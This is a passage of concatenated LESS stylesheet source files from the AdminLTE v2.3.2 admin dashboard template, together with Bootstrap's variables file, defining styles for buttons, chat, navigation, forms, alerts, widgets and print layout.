  }
  &.btn-lg {
    height: @bs-height-lg;
    width: @bs-height-lg;
    padding-left: 0;
    padding-right: 0;
  }
  &.btn-sm {
    height: (@bs-height-sm + 2);
    width: (@bs-height-sm + 2);
    padding-left: 0;
    padding-right: 0;
  }
  &.btn-xs {
    height: (@bs-height-xs + 2);
    width: (@bs-height-xs + 2);
    padding-left: 0;
    padding-right: 0;
  }
}

.btn-social(@color-bg, @color: #fff) {
  background-color: @color-bg;
  .button-variant(@color, @color-bg, rgba(0, 0, 0, .2));
}

.btn-adn {
  .btn-social(#d87a68);
}

.btn-bitbucket {
  .btn-social(#205081);
}

.btn-dropbox {
  .btn-social(#1087dd);
}

.btn-facebook {
  .btn-social(#3b5998);
}

.btn-flickr {
  .btn-social(#ff0084);
}

.btn-foursquare {
  .btn-social(#f94877);
}

.btn-github {
  .btn-social(#444444);
}

.btn-google {
  .btn-social(#dd4b39);
}

.btn-instagram {
  .btn-social(#3f729b);
}

.btn-linkedin {
  .btn-social(#007bb6);
}

.btn-microsoft {
  .btn-social(#2672ec);
}

.btn-openid {
  .btn-social(#f7931e);
}

.btn-pinterest {
  .btn-social(#cb2027);
}

.btn-reddit {
  .btn-social(#eff7ff, #000);
}

.btn-soundcloud {
  .btn-social(#ff5500);
}

.btn-tumblr {
  .btn-social(#2c4762);
}

.btn-twitter {
  .btn-social(#55acee);
}

.btn-vimeo {
  .btn-social(#1ab7ea);
}

.btn-vk {
  .btn-social(#587ea3);
}

.btn-yahoo {
  .btn-social(#720e9e);
}
less/.csslintrc000066400000001041152434265230007523 0ustar00{
  "adjoining-classes": false,
  "box-sizing": false,
  "box-model": false,
  "compatible-vendor-prefixes": false,
  "floats": false,
  "font-sizes": false,
  "gradients": false,
  "important": false,
  "known-properties": false,
  "outline-none": false,
  "qualified-headings": false,
  "regex-selectors": false,
  "shorthand": false,
  "text-indent": false,
  "unique-headings": false,
  "universal-selector": false,
  "unqualified-attributes": false,
  "ids": false,
  "fallback-colors": false,
  "vendor-prefix": false,
  "import": false
}
less/direct-chat.less000066400000005757152434265230010617 0ustar00/*
 * Component: Direct Chat
 * ----------------------
 */
.direct-chat {
  .box-body {
    .border-bottom-radius(0);
    position: relative;
    overflow-x: hidden;
    padding: 0;
  }
  &.chat-pane-open {
    .direct-chat-contacts {
      .translate(0, 0);
    }
  }
}

.direct-chat-messages {
  .translate(0, 0);
  padding: 10px;
  height: 250px;
  overflow: auto;
}

.direct-chat-msg,
.direct-chat-text {
  display: block;
}

.direct-chat-msg {
  .clearfix();
  margin-bottom: 10px;
}

.direct-chat-messages,
.direct-chat-contacts {
  .transition-transform(.5s ease-in-out);
}

.direct-chat-text {
  .border-radius(5px);
  position: relative;
  padding: 5px 10px;
  background: @direct-chat-default-msg-bg;
  border: 1px solid @direct-chat-default-msg-border-color;
  margin: 5px 0 0 50px;
  color: @direct-chat-default-font-color;

  //Create the arrow
  &:after,
  &:before {
    position: absolute;
    right: 100%;
    top: 15px;
    border: solid transparent;
    border-right-color: @direct-chat-default-msg-border-color;
    content: ' ';
    height: 0;
    width: 0;
    pointer-events: none;
  }

  &:after {
    border-width: 5px;
    margin-top: -5px;
  }
  &:before {
    border-width: 6px;
    margin-top: -6px;
  }
  .right & {
    margin-right: 50px;
    margin-left: 0;
    &:after,
    &:before {
      right: auto;
      left: 100%;
      border-right-color: transparent;
      border-left-color: @direct-chat-default-msg-border-color;
    }
  }
}

.direct-chat-img {
  .border-radius(50%);
  float: left;
  width: 40px;
  height: 40px;
  .right & {
    float: right;
  }
}

.direct-chat-info {
  display: block;
  margin-bottom: 2px;
  font-size: 12px;
}

.direct-chat-name {
  font-weight: 600;
}

.direct-chat-timestamp {
  color: #999;
}

//Direct chat contacts pane
.direct-chat-contacts-open {
  .direct-chat-contacts {
    .translate(0, 0);
  }
}

.direct-chat-contacts {
  .translate(101%, 0);
  position: absolute;
  top: 0;
  bottom: 0;
  height: 250px;
  width: 100%;
  background: #222d32;
  color: #fff;
  overflow: auto;
}

//Contacts list -- for displaying contacts in direct chat contacts pane
.contacts-list {
  &:extend(.list-unstyled);
  > li {
    .clearfix();
    border-bottom: 1px solid rgba(0, 0, 0, 0.2);
    padding: 10px;
    margin: 0;
    &:last-of-type {
      border-bottom: none;
    }
  }
}

.contacts-list-img {
  .border-radius(50%);
  width: 40px;
  float: left;
}

.contacts-list-info {
  margin-left: 45px;
  color: #fff;
}

.contacts-list-name,
.contacts-list-status {
  display: block;
}

.contacts-list-name {
  font-weight: 600;
}

.contacts-list-status {
  font-size: 12px;
}

.contacts-list-date {
  color: #aaa;
  font-weight: normal;
}

.contacts-list-msg {
  color: #999;
}

//Direct Chat Variants
.direct-chat-danger {
  .direct-chat-variant(@red);
}

.direct-chat-primary {
  .direct-chat-variant(@light-blue);
}

.direct-chat-warning {
  .direct-chat-variant(@yellow);
}

.direct-chat-info {
  .direct-chat-variant(@aqua);
}

.direct-chat-success {
  .direct-chat-variant(@green);
}
less/print.less000066400000001707152434265230007553 0ustar00/*
 * Misc: print
 * -----------
 */
@media print {
  //Add to elements that you do not want to show when printing
  .no-print {
    display: none !important;
  }

  //Elements that we want to hide when printing
  .main-sidebar,
  .left-side,
  .main-header,
  .content-header {
    &:extend(.no-print);
  }

  //This is the only element that should appear, so let's remove the margins
  .content-wrapper,
  .right-side,
  .main-footer {
    margin-left: 0 !important;
    min-height: 0 !important;
    .translate(0, 0) !important;
  }

  .fixed .content-wrapper,
  .fixed .right-side {
    padding-top: 0 !important;
  }

  //Invoice printing
  .invoice {
    width: 100%;
    border: 0;
    margin: 0;
    padding: 0;
  }

  .invoice-col {
    float: left;
    width: 33.3333333%;
  }

  //Make sure table content displays properly
  .table-responsive {
    overflow: auto;
    > .table tr th,
    > .table tr td {
      white-space: normal !important;
    }
  }
}
less/lockscreen.less000066400000002167152434265230010550 0ustar00/*
 * Page: Lock Screen
 * -----------------
 */
/* ADD THIS CLASS TO THE <BODY> TAG */
.lockscreen {
  background: @gray;
}

.lockscreen-logo {
  font-size: 35px;
  text-align: center;
  margin-bottom: 25px;
  font-weight: 300;
  a {
    color: #444;
  }
}

.lockscreen-wrapper {
  max-width: 400px;
  margin: 0 auto;
  margin-top: 10%;
}

/* User name [optional] */
.lockscreen .lockscreen-name {
  text-align: center;
  font-weight: 600;
}

/* Will contain the image and the sign in form */
.lockscreen-item {
  .border-radius(4px);
  padding: 0;
  background: #fff;
  position: relative;
  margin: 10px auto 30px auto;
  width: 290px;
}

/* User image */
.lockscreen-image {
  .border-radius(50%);
  position: absolute;
  left: -10px;
  top: -25px;
  background: #fff;
  padding: 5px;
  z-index: 10;
  > img {
    .border-radius(50%);
    width: 70px;
    height: 70px;
  }
}

/* Contains the password input and the login button */
.lockscreen-credentials {
  margin-left: 70px;
  .form-control {
    border: 0;
  }
  .btn {
    background-color: #fff;
    border: 0;
    padding: 0 10px;
  }
}

.lockscreen-footer {
  margin-top: 10px;
}
less/navs.less000066400000007367152434265230007376 0ustar00/*
 * Component: Nav
 * --------------
 */

.nav {
  > li > a:hover,
  > li > a:active,
  > li > a:focus {
    color: #444;
    background: #f7f7f7;
  }
}

/* NAV PILLS */
.nav-pills {
  > li > a {
    .border-radius(0);
    border-top: 3px solid transparent;
    color: #444;
    > .fa,
    > .glyphicon,
    > .ion {
      margin-right: 5px;
    }
  }
  > li.active > a,
  > li.active > a:hover,
  > li.active > a:focus {
    border-top-color: @light-blue;
  }
  > li.active > a {
    font-weight: 600;
  }
}

/* NAV STACKED */
.nav-stacked {
  > li > a {
    .border-radius(0);
    border-top: 0;
    border-left: 3px solid transparent;
    color: #444;
  }
  > li.active > a,
  > li.active > a:hover {
    background: transparent;
    color: #444;
    border-top: 0;
    border-left-color: @light-blue;
  }

  > li.header {
    border-bottom: 1px solid #ddd;
    color: #777;
    margin-bottom: 10px;
    padding: 5px 10px;
    text-transform: uppercase;
  }
}

/* NAV TABS */
.nav-tabs-custom {
  margin-bottom: 20px;
  background: #fff;
  box-shadow: @box-boxshadow;
  border-radius: @box-border-radius;
  > .nav-tabs {
    margin: 0;
    border-bottom-color: #f4f4f4;
    .border-top-radius(@box-border-radius);
    > li {
      border-top: 3px solid transparent;
      margin-bottom: -2px;
      > a {
        color: #444;
        .border-radius(0);
        &.text-muted {
          color: #999;
        }
        &,
        &:hover {
          background: transparent;
          margin: 0;
        }
        &:hover {
          color: #999;
        }
      }
      &:not(.active) {
        > a:hover,
        > a:focus,
        > a:active {
          border-color: transparent;
        }
      }
      margin-right: 5px;
    }

    > li.active {
      border-top-color: @light-blue;
      & > a,
      &:hover > a {
        background-color: #fff;
        color: #444;
      }
      > a {
        border-top-color: transparent;
        border-left-color: #f4f4f4;
        border-right-color: #f4f4f4;
      }

    }

    > li:first-of-type {
      margin-left: 0;
      &.active {
        > a {
          border-left-color: transparent;
        }
      }
    }

    //Pulled to the right
    &.pull-right {
      float: none !important;
      > li {
        float: right;
      }
      > li:first-of-type {
        margin-right: 0;
        > a {
          border-left-width: 1px;
        }
        &.active {
          > a {
            border-left-color: #f4f4f4;
            border-right-color: transparent;
          }
        }
      }
    }

    > li.header {
      line-height: 35px;
      padding: 0 10px;
      font-size: 20px;
      color: #444;
      > .fa,
      > .glyphicon,
      > .ion {
        margin-right: 5px;
      }
    }
  }

  > .tab-content {
    background: #fff;
    padding: 10px;
    .border-bottom-radius(@box-border-radius);
  }

  .dropdown.open > a {
    &:active,
    &:focus {
      background: transparent;
      color: #999;
    }
  }
  // Tab color variations
  &.tab-primary {
    > .nav-tabs {
      > li.active {
        border-top-color: @light-blue;
      }
    }
  }
  &.tab-info {
    > .nav-tabs {
      > li.active {
        border-top-color: @aqua;
      }
    }
  }
  &.tab-danger {
    > .nav-tabs {
      > li.active {
        border-top-color: @red;
      }
    }
  }
  &.tab-warning {
    > .nav-tabs {
      > li.active {
        border-top-color: @yellow;
      }
    }
  }
  &.tab-success {
    > .nav-tabs {
      > li.active {
        border-top-color: @green;
      }
    }
  }
  &.tab-default {
    > .nav-tabs {
      > li.active {
        border-top-color: @gray;
      }
    }
  }
}

/* PAGINATION */
.pagination {
  > li > a {
    background: #fafafa;
    color: #666;
  }
  &.pagination-flat {
    > li > a {
      .border-radius(0) !important;
    }
  }
}
less/forms.less000066400000003215152434265230007541 0ustar00/*
 * Component: Form
 * ---------------
 */
.form-control {
  .border-radius(@input-radius);
  box-shadow: none;
  border-color: @gray;
  &:focus {
    border-color: @light-blue;
    box-shadow: none;
  }
  &::-moz-placeholder,
  &:-ms-input-placeholder,
  &::-webkit-input-placeholder {
    color: #bbb;
    opacity: 1;
  }

  &:not(select) {
    -webkit-appearance: none;
    -moz-appearance: none;
    appearance: none;
  }
}

.form-group {
  &.has-success {
    label {
      color: @green;
    }
    .form-control {
      border-color: @green;
      box-shadow: none;
    }
  }

  &.has-warning {
    label {
      color: @yellow;
    }
    .form-control {
      border-color: @yellow;
      box-shadow: none;
    }
  }

  &.has-error {
    label {
      color: @red;
    }
    .form-control {
      border-color: @red;
      box-shadow: none;
    }
  }
}

/* Input group */
.input-group {
  .input-group-addon {
    .border-radius(@input-radius);
    border-color: @gray;
    background-color: #fff;
  }
}

/* button groups */
.btn-group-vertical {
  .btn {
    &.btn-flat:first-of-type, &.btn-flat:last-of-type {
      .border-radius(0);
    }
  }
}

.icheck > label {
  padding-left: 0;
}

/* support Font Awesome icons in form-control */
.form-control-feedback.fa {
  line-height: @input-height-base;
}

.input-lg + .form-control-feedback.fa,
.input-group-lg + .form-control-feedback.fa,
.form-group-lg .form-control + .form-control-feedback.fa {
  line-height: @input-height-large;
}

.input-sm + .form-control-feedback.fa,
.input-group-sm + .form-control-feedback.fa,
.form-group-sm .form-control + .form-control-feedback.fa {
  line-height: @input-height-small;
}
less/alerts.less000066400000001201152434265230007676 0ustar00/*
 * Component: alert
 * ----------------
 */

.alert {
  .border-radius(3px);
  h4 {
    font-weight: 600;
  }
  .icon {
    margin-right: 10px;
  }
  .close {
    color: #000;
    .opacity(.2);
    &:hover {
      .opacity(.5);
    }
  }
  a {
    color: #fff;
    text-decoration: underline;
  }
}

//Alert Variants
.alert-success {
  &:extend(.bg-green);
  border-color: darken(@green, 5%);
}

.alert-danger,
.alert-error {
  &:extend(.bg-red);
  border-color: darken(@red, 5%);
}

.alert-warning {
  &:extend(.bg-yellow);
  border-color: darken(@yellow, 5%);
}

.alert-info {
  &:extend(.bg-aqua);
  border-color: darken(@aqua, 5%);
}
less/social-widgets.less000066400000002570152434265230011334 0ustar00/*
 * Component: Social Widgets
 * -------------------------
 */
//General widget style
.box-widget {
  border: none;
  position: relative;
}

//User Widget Style 1
.widget-user {
  //User name container
  .widget-user-header {
    padding: 20px;
    height: 120px;
    .border-top-radius(@box-border-radius);
  }
  //User name
  .widget-user-username {
    margin-top: 0;
    margin-bottom: 5px;
    font-size: 25px;
    font-weight: 300;
    text-shadow: 0 1px 1px rgba(0, 0, 0, 0.2);
  }
  //User single line description
  .widget-user-desc {
    margin-top: 0;
  }
  //User image container
  .widget-user-image {
    position: absolute;
    top: 65px;
    left: 50%;
    margin-left: -45px;
    > img {
      width: 90px;
      height: auto;
      border: 3px solid #fff;
    }
  }
  .box-footer {
    padding-top: 30px;
  }
}

//User Widget Style 2
.widget-user-2 {
  //User name container
  .widget-user-header {
    padding: 20px;
    .border-top-radius(@box-border-radius);
  }
  //User name
  .widget-user-username {
    margin-top: 5px;
    margin-bottom: 5px;
    font-size: 25px;
    font-weight: 300;
  }
  //User single line description
  .widget-user-desc {
    margin-top: 0;
  }
  .widget-user-username,
  .widget-user-desc {
    margin-left: 75px;
  }
  //User image container
  .widget-user-image {
    > img {
      width: 65px;
      height: auto;
      float: left;
    }
  }
}
less/AdminLTE.less000066400000003166152434265230010015 0ustar00/*!
 *   AdminLTE v2.3.2
 *   Author: Almsaeed Studio
 *	 Website: Almsaeed Studio <http://almsaeedstudio.com>
 *   License: Open source - MIT
 *           Please visit http://opensource.org/licenses/MIT for more information
!*/
//google fonts
@import url(https://fonts.googleapis.com/css?family=Source+Sans+Pro:300,400,600,700,300italic,400italic,600italic);
//Bootstrap Variables & Mixins
//The core bootstrap code have not been modified. These files
//are included only for reference.
@import (reference) "../bootstrap-less/mixins.less";
@import (reference) "../bootstrap-less/variables.less";
//MISC
//----
@import "core.less";
@import "variables.less";
@import "mixins.less";
//COMPONENTS
//-----------
@import "header.less";
@import "sidebar.less";
@import "sidebar-mini.less";
@import "control-sidebar.less";
@import "dropdown.less";
@import "forms.less";
@import "progress-bars.less";
@import "small-box.less";
@import "boxes.less";
@import "info-box.less";
@import "timeline.less";
@import "buttons.less";
@import "callout.less";
@import "alerts.less";
@import "navs.less";
@import "products.less";
@import "table.less";
@import "labels.less";
@import "direct-chat.less";
@import "users-list.less";
@import "carousel.less";
@import "modal.less";
@import "social-widgets.less";
//PAGES
//------
@import "mailbox.less";
@import "lockscreen.less";
@import "login_and_register.less";
@import "404_500_errors.less";
@import "invoice.less";
@import "profile";
//Plugins
//--------
@import "bootstrap-social.less";
@import "fullcalendar.less";
@import "select2.less";
//Miscellaneous
//-------------
@import "miscellaneous.less";
@import "print.less";
less/small-box.less000066400000002650152434265230010313 0ustar00/*
 * Component: Small Box
 * --------------------
 */

.small-box {
  .border-radius(2px);
  position: relative;
  display: block;
  margin-bottom: 20px;
  box-shadow: @box-boxshadow;
  // content wrapper
  > .inner {
    padding: 10px;
  }

  > .small-box-footer {
    position: relative;
    text-align: center;
    padding: 3px 0;
    color: #fff;
    color: rgba(255, 255, 255, 0.8);
    display: block;
    z-index: 10;
    background: rgba(0, 0, 0, 0.1);
    text-decoration: none;
    &:hover {
      color: #fff;
      background: rgba(0, 0, 0, 0.15);
    }
  }

  h3 {
    font-size: 38px;
    font-weight: bold;
    margin: 0 0 10px 0;
    white-space: nowrap;
    padding: 0;

  }

  p {
    font-size: 15px;
    > small {
      display: block;
      color: #f9f9f9;
      font-size: 13px;
      margin-top: 5px;
    }
  }

  h3, p {
    z-index: 5px;
  }

  // the icon
  .icon {
    .transition(all @transition-speed linear);
    position: absolute;
    top: -10px;
    right: 10px;
    z-index: 0;
    font-size: 90px;
    color: rgba(0, 0, 0, 0.15);
  }

  // Small box hover state
  &:hover {
    text-decoration: none;
    color: #f9f9f9;
    // Animate icons on small box hover
    .icon {
      font-size: 95px;
    }
  }
}

@media (max-width: @screen-xs-max) {
  // No need for icons on very small devices
  .small-box {
    text-align: center;
    .icon {
      display: none;
    }
    p {
      font-size: 12px;
    }
  }
}
less/invoice.less000066400000000311152434265230010041 0ustar00/*
 * Page: Invoice
 * -------------
 */

.invoice {
  position: relative;
  background: #fff;
  border: 1px solid #f4f4f4;
  padding: 20px;
  margin: 10px 25px;
}

.invoice-title {
  margin-top: 0;
}
bootstrap-less/variables.less000066400000054514152434265230012406 0ustar00//
// Variables
// --------------------------------------------------

//== Colors
//
//## Gray and brand colors for use across Bootstrap.

@gray-base: #000;
@gray-darker: lighten(@gray-base, 13.5%);
// #222
@gray-dark: lighten(@gray-base, 20%);
// #333
@gray: lighten(@gray-base, 33.5%);
// #555
@gray-light: lighten(@gray-base, 46.7%);
// #777
@gray-lighter: lighten(@gray-base, 93.5%);
// #eee

@brand-primary: darken(#428bca, 6.5%);
// #337ab7
@brand-success: #5cb85c;
@brand-info: #5bc0de;
@brand-warning: #f0ad4e;
@brand-danger: #d9534f;

//== Scaffolding
//
//## Settings for some of the most global styles.

//** Background color for `<body>`.
@body-bg: #fff;
//** Global text color on `<body>`.
@text-color: @gray-dark;

//** Global textual link color.
@link-color: @brand-primary;
//** Link hover color set via `darken()` function.
@link-hover-color: darken(@link-color, 15%);
//** Link hover decoration.
@link-hover-decoration: underline;

//== Typography
//
//## Font, line-height, and color for body text, headings, and more.

@font-family-sans-serif: "Helvetica Neue", Helvetica, Arial, sans-serif;
@font-family-serif: Georgia, "Times New Roman", Times, serif;
//** Default monospace fonts for `<code>`, `<kbd>`, and `<pre>`.
@font-family-monospace: Menlo, Monaco, Consolas, "Courier New", monospace;
@font-family-base: @font-family-sans-serif;

@font-size-base: 14px;
@font-size-large: ceil((@font-size-base * 1.25));
// ~18px
@font-size-small: ceil((@font-size-base * 0.85));
// ~12px

@font-size-h1: floor((@font-size-base * 2.6));
// ~36px
@font-size-h2: floor((@font-size-base * 2.15));
// ~30px
@font-size-h3: ceil((@font-size-base * 1.7));
// ~24px
@font-size-h4: ceil((@font-size-base * 1.25));
// ~18px
@font-size-h5: @font-size-base;
@font-size-h6: ceil((@font-size-base * 0.85));
// ~12px

//** Unit-less `line-height` for use in components like buttons.
@line-height-base: 1.428571429;
// 20/14
//** Computed "line-height" (`font-size` * `line-height`) for use with `margin`, `padding`, etc.
@line-height-computed: floor((@font-size-base * @line-height-base));
// ~20px

//** By default, this inherits from the `<body>`.
@headings-font-family: inherit;
@headings-font-weight: 500;
@headings-line-height: 1.1;
@headings-color: inherit;

//== Iconography
//
//## Specify custom location and filename of the included Glyphicons icon font. Useful for those including Bootstrap via Bower.

//** Load fonts from this directory.
@icon-font-path: "../fonts/";
//** File name for all font files.
@icon-font-name: "glyphicons-halflings-regular";
//** Element ID within SVG icon file.
@icon-font-svg-id: "glyphicons_halflingsregular";

//== Components
//
//## Define common padding and border radius sizes and more. Values based on 14px text and 1.428 line-height (~20px to start).

@padding-base-vertical: 6px;
@padding-base-horizontal: 12px;

@padding-large-vertical: 10px;
@padding-large-horizontal: 16px;

@padding-small-vertical: 5px;
@padding-small-horizontal: 10px;

@padding-xs-vertical: 1px;
@padding-xs-horizontal: 5px;

@line-height-large: 1.3333333;
// extra decimals for Win 8.1 Chrome
@line-height-small: 1.5;

@border-radius-base: 4px;
@border-radius-large: 6px;
@border-radius-small: 3px;

//** Global color for active items (e.g., navs or dropdowns).
@component-active-color: #fff;
//** Global background color for active items (e.g., navs or dropdowns).
@component-active-bg: @brand-primary;

//** Width of the `border` for generating carets that indicator dropdowns.
@caret-width-base: 4px;
//** Carets increase slightly in size for larger components.
@caret-width-large: 5px;

//== Tables
//
//## Customizes the `.table` component with basic values, each used across all table variations.

//** Padding for `<th>`s and `<td>`s.
@table-cell-padding: 8px;
//** Padding for cells in `.table-condensed`.
@table-condensed-cell-padding: 5px;

//** Default background color used for all tables.
@table-bg: transparent;
//** Background color used for `.table-striped`.
@table-bg-accent: #f9f9f9;
//** Background color used for `.table-hover`.
@table-bg-hover: #f5f5f5;
@table-bg-active: @table-bg-hover;

//** Border color for table and cell borders.
@table-border-color: #ddd;

//== Buttons
//
//## For each of Bootstrap's buttons, define text, background and border color.

@btn-font-weight: normal;

@btn-default-color: #333;
@btn-default-bg: #fff;
@btn-default-border: #ccc;

@btn-primary-color: #fff;
@btn-primary-bg: @brand-primary;
@btn-primary-border: darken(@btn-primary-bg, 5%);

@btn-success-color: #fff;
@btn-success-bg: @brand-success;
@btn-success-border: darken(@btn-success-bg, 5%);

@btn-info-color: #fff;
@btn-info-bg: @brand-info;
@btn-info-border: darken(@btn-info-bg, 5%);

@btn-warning-color: #fff;
@btn-warning-bg: @brand-warning;
@btn-warning-border: darken(@btn-warning-bg, 5%);

@btn-danger-color: #fff;
@btn-danger-bg: @brand-danger;
@btn-danger-border: darken(@btn-danger-bg, 5%);

@btn-link-disabled-color: @gray-light;

//== Forms
//
//##

//** `<input>` background color
@input-bg: #fff;
//** `<input disabled>` background color
@input-bg-disabled: @gray-lighter;

//** Text color for `<input>`s
@input-color: @gray;
//** `<input>` border color
@input-border: #ccc;

// TODO: Rename `@input-border-radius` to `@input-border-radius-base` in v4
//** Default `.form-control` border radius
// This has no effect on `<select>`s in some browsers, due to the limited stylability of `<select>`s in CSS.
@input-border-radius: @border-radius-base;
//** Large `.form-control` border radius
@input-border-radius-large: @border-radius-large;
//** Small `.form-control` border radius
@input-border-radius-small: @border-radius-small;

//** Border color for inputs on focus
@input-border-focus: #66afe9;

//** Placeholder text color
@input-color-placeholder: #999;

//** Default `.form-control` height
@input-height-base: (@line-height-computed + (@padding-base-vertical * 2) + 2);
//** Large `.form-control` height
@input-height-large: (ceil(@font-size-large * @line-height-large) + (@padding-large-vertical * 2) + 2);
//** Small `.form-control` height
@input-height-small: (floor(@font-size-small * @line-height-small) + (@padding-small-vertical * 2) + 2);

//** `.form-group` margin
@form-group-margin-bottom: 15px;

@legend-color: @gray-dark;
@legend-border-color: #e5e5e5;

//** Background color for textual input addons
@input-group-addon-bg: @gray-lighter;
//** Border color for textual input addons
@input-group-addon-border-color: @input-border;

//** Disabled cursor for form controls and buttons.
@cursor-disabled: not-allowed;

//== Dropdowns
//
//## Dropdown menu container and contents.

//** Background for the dropdown menu.
@dropdown-bg: #fff;
//** Dropdown menu `border-color`.
@dropdown-border: rgba(0, 0, 0, .15);
//** Dropdown menu `border-color` **for IE8**.
@dropdown-fallback-border: #ccc;
//** Divider color for between dropdown items.
@dropdown-divider-bg: #e5e5e5;

//** Dropdown link text color.
@dropdown-link-color: @gray-dark;
//** Hover color for dropdown links.
@dropdown-link-hover-color: darken(@gray-dark, 5%);
//** Hover background for dropdown links.
@dropdown-link-hover-bg: #f5f5f5;

//** Active dropdown menu item text color.
@dropdown-link-active-color: @component-active-color;
//** Active dropdown menu item background color.
@dropdown-link-active-bg: @component-active-bg;

//** Disabled dropdown menu item background color.
@dropdown-link-disabled-color: @gray-light;

//** Text color for headers within dropdown menus.
@dropdown-header-color: @gray-light;

//** Deprecated `@dropdown-caret-color` as of v3.1.0
@dropdown-caret-color: #000;

//-- Z-index master list
//
// Warning: Avoid customizing these values. They're used for a bird's eye view
// of components dependent on the z-axis and are designed to all work together.
//
// Note: These variables are not generated into the Customizer.

@zindex-navbar: 1000;
@zindex-dropdown: 1000;
@zindex-popover: 1060;
@zindex-tooltip: 1070;
@zindex-navbar-fixed: 1030;
@zindex-modal-background: 1040;
@zindex-modal: 1050;

//== Media queries breakpoints
//
//## Define the breakpoints at which your layout will change, adapting to different screen sizes.

// Extra small screen / phone
//** Deprecated `@screen-xs` as of v3.0.1
@screen-xs: 480px;
//** Deprecated `@screen-xs-min` as of v3.2.0
@screen-xs-min: @screen-xs;
//** Deprecated `@screen-phone` as of v3.0.1
@screen-phone: @screen-xs-min;

// Small screen / tablet
//** Deprecated `@screen-sm` as of v3.0.1
@screen-sm: 768px;
@screen-sm-min: @screen-sm;
//** Deprecated `@screen-tablet` as of v3.0.1
@screen-tablet: @screen-sm-min;

// Medium screen / desktop
//** Deprecated `@screen-md` as of v3.0.1
@screen-md: 992px;
@screen-md-min: @screen-md;
//** Deprecated `@screen-desktop` as of v3.0.1
@screen-desktop: @screen-md-min;

// Large screen / wide desktop
//** Deprecated `@screen-lg` as of v3.0.1
@screen-lg: 1200px;
@screen-lg-min: @screen-lg;
//** Deprecated `@screen-lg-desktop` as of v3.0.1
@screen-lg-desktop: @screen-lg-min;

// So media queries don't overlap when required, provide a maximum
@screen-xs-max: (@screen-sm-min - 1);
@screen-sm-max: (@screen-md-min - 1);
@screen-md-max: (@screen-lg-min - 1);

//== Grid system
//
//## Define your custom responsive grid.

//** Number of columns in the grid.
@grid-columns: 12;
//** Padding between columns. Gets divided in half for the left and right.
@grid-gutter-width: 30px;
// Navbar collapse
//** Point at which the navbar becomes uncollapsed.
@grid-float-breakpoint: @screen-sm-min;
//** Point at which the navbar begins collapsing.
@grid-float-breakpoint-max: (@grid-float-breakpoint - 1);

//== Container sizes
//
//## Define the maximum width of `.container` for different screen sizes.

// Small screen / tablet
@container-tablet: (720px + @grid-gutter-width);
//** For `@screen-sm-min` and up.
@container-sm: @container-tablet;

// Medium screen / desktop
@container-desktop: (940px + @grid-gutter-width);
//** For `@screen-md-min` and up.
@container-md: @container-desktop;

// Large screen / wide desktop
@container-large-desktop: (1140px + @grid-gutter-width);
//** For `@screen-lg-min` and up.
@container-lg: @container-large-desktop;

//== Navbar
//
//##

// Basics of a navbar
@navbar-height: 50px;
@navbar-margin-bottom: @line-height-computed;
@navbar-border-radius: @border-radius-base;
@navbar-padding-horizontal: floor((@grid-gutter-width / 2));
@navbar-padding-vertical: ((@navbar-height - @line-height-computed) / 2);
@navbar-collapse-max-height: 340px;

@navbar-default-color: #777;
@navbar-default-bg: #f8f8f8;
@navbar-default-border: darken(@navbar-default-bg, 6.5%);

// Navbar links
@navbar-default-link-color: #777;
@navbar-default-link-hover-color: #333;
@navbar-default-link-hover-bg: transparent;
@navbar-default-link-active-color: #555;
@navbar-default-link-active-bg: darken(@navbar-default-bg, 6.5%);
@navbar-default-link-disabled-color: #ccc;
@navbar-default-link-disabled-bg: transparent;

// Navbar brand label
@navbar-default-brand-color: @navbar-default-link-color;
@navbar-default-brand-hover-color: darken(@navbar-default-brand-color, 10%);
@navbar-default-brand-hover-bg: transparent;

// Navbar toggle
@navbar-default-toggle-hover-bg: #ddd;
@navbar-default-toggle-icon-bar-bg: #888;
@navbar-default-toggle-border-color: #ddd;

// Inverted navbar
// Reset inverted navbar basics
@navbar-inverse-color: lighten(@gray-light, 15%);
@navbar-inverse-bg: #222;
@navbar-inverse-border: darken(@navbar-inverse-bg, 10%);

// Inverted navbar links
@navbar-inverse-link-color: lighten(@gray-light, 15%);
@navbar-inverse-link-hover-color: #fff;
@navbar-inverse-link-hover-bg: transparent;
@navbar-inverse-link-active-color: @navbar-inverse-link-hover-color;
@navbar-inverse-link-active-bg: darken(@navbar-inverse-bg, 10%);
@navbar-inverse-link-disabled-color: #444;
@navbar-inverse-link-disabled-bg: transparent;

// Inverted navbar brand label
@navbar-inverse-brand-color: @navbar-inverse-link-color;
@navbar-inverse-brand-hover-color: #fff;
@navbar-inverse-brand-hover-bg: transparent;

// Inverted navbar toggle
@navbar-inverse-toggle-hover-bg: #333;
@navbar-inverse-toggle-icon-bar-bg: #fff;
@navbar-inverse-toggle-border-color: #333;

//== Navs
//
//##

//=== Shared nav styles
@nav-link-padding: 10px 15px;
@nav-link-hover-bg: @gray-lighter;

@nav-disabled-link-color: @gray-light;
@nav-disabled-link-hover-color: @gray-light;

//== Tabs
@nav-tabs-border-color: #ddd;

@nav-tabs-link-hover-border-color: @gray-lighter;

@nav-tabs-active-link-hover-bg: @body-bg;
@nav-tabs-active-link-hover-color: @gray;
@nav-tabs-active-link-hover-border-color: #ddd;

@nav-tabs-justified-link-border-color: #ddd;
@nav-tabs-justified-active-link-border-color: @body-bg;

//== Pills
@nav-pills-border-radius: @border-radius-base;
@nav-pills-active-link-hover-bg: @component-active-bg;
@nav-pills-active-link-hover-color: @component-active-color;

//== Pagination
//
//##

@pagination-color: @link-color;
@pagination-bg: #fff;
@pagination-border: #ddd;

@pagination-hover-color: @link-hover-color;
@pagination-hover-bg: @gray-lighter;
@pagination-hover-border: #ddd;

@pagination-active-color: #fff;
@pagination-active-bg: @brand-primary;
@pagination-active-border: @brand-primary;

@pagination-disabled-color: @gray-light;
@pagination-disabled-bg: #fff;
@pagination-disabled-border: #ddd;

//== Pager
//
//##

@pager-bg: @pagination-bg;
@pager-border: @pagination-border;
@pager-border-radius: 15px;

@pager-hover-bg: @pagination-hover-bg;

@pager-active-bg: @pagination-active-bg;
@pager-active-color: @pagination-active-color;

@pager-disabled-color: @pagination-disabled-color;

//== Jumbotron
//
//##

@jumbotron-padding: 30px;
@jumbotron-color: inherit;
@jumbotron-bg: @gray-lighter;
@jumbotron-heading-color: inherit;
@jumbotron-font-size: ceil((@font-size-base * 1.5));

//== Form states and alerts
//
//## Define colors for form feedback states and, by default, alerts.

@state-success-text: #3c763d;
@state-success-bg: #dff0d8;
@state-success-border: darken(spin(@state-success-bg, -10), 5%);

@state-info-text: #31708f;
@state-info-bg: #d9edf7;
@state-info-border: darken(spin(@state-info-bg, -10), 7%);

@state-warning-text: #8a6d3b;
